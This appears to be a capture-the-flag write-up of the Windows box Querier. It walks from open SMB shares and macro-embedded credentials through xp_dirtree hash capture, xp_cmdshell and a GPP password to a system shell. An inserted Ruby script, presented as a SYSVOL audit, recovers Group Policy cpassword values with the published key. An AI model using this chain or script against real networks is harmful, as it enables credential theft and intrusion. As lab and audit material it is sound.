Querier was a straightforward Windows machine which I think was a fairly realistic box you might find on a typical corporate network.
Nmap scan:
![](/content/images/2019/06/image-15.png)
SMB is usually low-hanging fruit so I check out what shares are available:
![](/content/images/2019/06/image-16.png)
The 'Reports' share is unsecured, so I connect with smbclient and see a spreadsheet in it:
![](/content/images/2019/06/image-20.png)
Contents of the spreadsheet file:
![](/content/images/2019/06/image-18.png)
Microsoft Office documents (.doc, .xls, etc.) are really zip archives, so I unzip it, take a look at the vbaProject.bin file and find a username and password:
![](/content/images/2019/06/image-21.png)
These creds worked for rpcclient, but I couldn't really do anything with them, so I tried attacking SQL next with sqsh.
![](/content/images/2019/06/image-22.png)
Unfortunately this account did not have permission to enable xp_cmdshell:
![](/content/images/2019/06/image-23.png)
![](/content/images/2019/06/image-24.png)
The next logical step was to see if I could capture hashes. I declared @q as the UNC path of a fake share on my attacking machine, then had SQL Server connect to it using the xp_dirtree stored procedure:
![](/content/images/2019/06/image-27.png)
With impacket's SMB server listening, I get a hash:
![](/content/images/2019/06/image-28.png)
I saved the hash to 'fullhash.txt' and used John to crack it:
![](/content/images/2019/06/image-29.png)
I use these new creds with sqsh:
![](/content/images/2019/06/image-30.png)
This account does have permission to enable xp_cmdshell:
![](/content/images/2019/06/image-31.png)
Confirmation that I have code execution:
![](/content/images/2019/06/image-32.png)
I downloaded a mssql shell from here, edited it with the correct IP and creds and got a shell:
![](/content/images/2019/06/image-33.png)
User flag:
![](/content/images/2019/06/image-34.png)
To escalate privileges, one of the first things you look for on a Windows machine is a groups.xml file:
![](/content/images/2019/06/image-35.png)
In it, you'll find an encrypted password:
![](/content/images/2019/06/image-36.png)
Use gpp-decrypt to decrypt:
![](/content/images/2019/06/image-37.png)
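The reason gpp-decrypt works is that the cpassword in groups.xml is AES-256-CBC under a key Microsoft published, with a zero IV and the base64 padding stripped, so anyone who can read SYSVOL can recover the password. This is an added example (not code from the original post or from gpp-decrypt) written in Ruby, the language gpp-decrypt itself is written in: it audits a Groups.xml body for cpassword attributes and recovers each one. The Groups.xml, the account name svc_backup and the password are constructed; the key, IV and encoding steps are the real GPP scheme.

```ruby
require 'openssl'

# AES-256 key that Microsoft published for Group Policy Preferences (MS14-025).
# Because the key is public, a cpassword is recoverable by anyone who can read SYSVOL.
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_IV  = "\x00" * 16 # GPP uses an all-zero IV

def gpp_cipher(mode) # mode is :encrypt or :decrypt
  c = OpenSSL::Cipher.new('aes-256-cbc')
  c.public_send(mode)
  c.key = GPP_KEY
  c.iv  = GPP_IV
  c
end

# Decrypt one cpassword attribute value back to the plaintext password.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4) # GPP strips the base64 '='
  c = gpp_cipher(:decrypt)
  plain = c.update(padded.unpack1('m')) + c.final # OpenSSL removes the PKCS#7 padding
  plain.force_encoding('UTF-16LE').encode('UTF-8') # GPP stores the password as UTF-16LE
end

# Inverse operation, used here only to build the constructed sample file below.
def encrypt_cpassword(password)
  c = gpp_cipher(:encrypt)
  enc = c.update(password.encode('UTF-16LE')) + c.final
  [enc].pack('m0').delete('=')
end

# Scan a Groups.xml body for <Properties> tags carrying a cpassword and return
# [userName, plaintext] pairs; attribute order inside the tag does not matter.
def audit_groups_xml(xml)
  xml.scan(/<Properties\b[^>]*>/).each_with_object([]) do |tag, found|
    cpw = tag[/\bcpassword="([^"]*)"/, 1]
    next if cpw.nil? || cpw.empty?
    user = tag[/\buserName="([^"]*)"/, 1] || '(unknown)'
    found << [user, decrypt_cpassword(cpw)]
  end
end

# Constructed sample (not the file from the box): the cpassword is generated here with
# the public key, exactly as the Group Policy editor would have stored it.
SAMPLE_PASSWORD = 'Constructed-Pa55w0rd!'
SAMPLE_GROUPS_XML = <<~XML
  <Groups>
    <User name="svc_backup" changed="2019-06-01 12:00:00">
      <Properties action="U" newName="" cpassword="#{encrypt_cpassword(SAMPLE_PASSWORD)}" changeLogon="0" neverExpires="1" userName="svc_backup"/>
    </User>
  </Groups>
XML

audit_groups_xml(SAMPLE_GROUPS_XML).each { |u, p| puts "#{u}: cpassword decrypts to #{p.inspect}" }
```

Run the same audit over every Groups.xml, ScheduledTasks.xml, Services.xml and Drives.xml under \\domain\SYSVOL to find any cpassword that is still lingering after the MS14-025 fix.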
Alternatively, you can use PowerUp.ps1. After transferring it to Querier, I run it and save the output to check.txt:
![](/content/images/2019/06/image-41.png)
Inside check.txt is the admin password:
![](/content/images/2019/06/image-39.png)
Now psexec is used to gain a system shell:
![](/content/images/2019/06/image-40.png)
Root flag:
![](/content/images/2019/06/image-42.png)